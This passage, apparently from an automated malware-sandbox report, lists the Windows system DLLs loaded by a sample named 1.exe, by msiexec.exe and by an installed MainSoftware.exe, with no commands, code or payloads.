    Source: C:\Users\user\Desktop\1.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: atlthunk.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: explorerframe.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: tsappcmp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: taskschd.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msi.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: davhlpr.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: lpk.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msihnd.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: tsappcmp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: icu.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: wshunix.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: devobj.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: gpapi.dllJump to behavior
